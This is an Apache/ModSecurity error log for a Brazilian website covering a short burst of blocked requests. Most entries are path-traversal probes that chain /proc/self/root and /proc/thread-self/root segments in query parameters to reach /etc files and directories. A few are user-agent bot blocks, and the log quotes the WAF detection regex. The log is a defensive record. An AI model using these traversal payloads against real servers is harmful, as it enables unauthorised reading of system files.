[Wed Mar 18 08:37:45.922714 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.241.31:47506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOieoXxyEfFpUF8f9YZAAAAUU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:51.615381 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:40284] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOjymAPhZkrhU8w4lWzQAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 08:37:53.001391 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:36604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOkda6ubjKNq_cu4aCDwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 08:37:54.286945 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:36616] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOkvu8EFLIOrSqIpvusQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:37:55.679849 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:36620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOk_u8EFLIOrSqIpvutgAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:37:58.227164 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:36634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOluw_le52K8_3pV3KHwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:37:59.517945 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:45410] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOl9Y0UrI5A3LftIyKawAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:02.984851 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:45418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOmta6ubjKNq_cu4aCHQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:02.988798 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.244.43:37896] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqOmkzinOy1jxa1j4f86wAAARQ"]
[Wed Mar 18 08:38:04.923803 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:45432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOnMdf6f5d65gmYZS91gAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:06.206501 2026] [:error] [pid 17653:tid 140411574073088] [client 74.7.243.128:45448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOnsdf6f5d65gmYZS93AAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:06.799475 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:39810] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOnta6ubjKNq_cu4aCIQAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:07.379749 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.228.61:40720] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqOn9Y0UrI5A3LftIyKeQAAAY4"]
[Wed Mar 18 08:38:07.515115 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.243.128:45450] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOn9Y0UrI5A3LftIyKegAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:08.871501 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.243.128:45464] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOoEzinOy1jxa1j4f89AAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:10.175262 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:56224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOokzinOy1jxa1j4f8-wAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:11.450545 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:56238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOo9a6ubjKNq_cu4aCIwAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:14.915354 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.243.128:56242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOpvu8EFLIOrSqIpvuzwAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:18.669358 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:56252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOqta6ubjKNq_cu4aCLAAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:20.022846 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.243.128:59580] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOrOw_le52K8_3pV3KLgAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:22.325012 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:59584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOrtY0UrI5A3LftIyKmgAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 08:38:27.210473 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:44882] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOskzinOy1jxa1j4f9MAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 08:38:27.218364 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:59590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqOs9Y0UrI5A3LftIyKnwAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
